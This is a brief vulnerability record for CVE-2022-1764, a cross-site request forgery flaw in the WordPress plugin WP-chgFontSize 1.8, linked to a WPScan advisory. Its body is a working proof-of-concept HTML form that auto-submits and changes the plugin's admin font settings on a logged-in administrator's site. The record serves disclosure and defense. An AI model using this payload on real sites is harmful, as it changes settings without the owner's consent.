CVE: CVE-2022-1764

Name: WP-chgFontSize (wp-chgfontsize)

Version: 1.8

Date: 2022-04-18 17:20:41

Advisory: https://wpscan.com/vulnerability/04305e4e-37e3-4f35-bf66-3b79b99d2868

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=wp-chgfontsize.php" method="POST">
    <input type="text" name="chgfontsize_div_element" value="body">
    <input type="text" name="chgfontsize_min_font_size" value="0">
    <input type="text" name="chgfontsize_max_font_size" value="500">
    <input type="text" name="chgfontsize_interval_font_size" value="">
    <input type="text" name="chgfontsize_units_font_size" value="px">
    <input type="text" name="chgfontsize_default_font_size" value="500">
    <input type="text" name="info_update" value="Update Options »">
</form>
<script>
    document.forms[0].submit();
</script>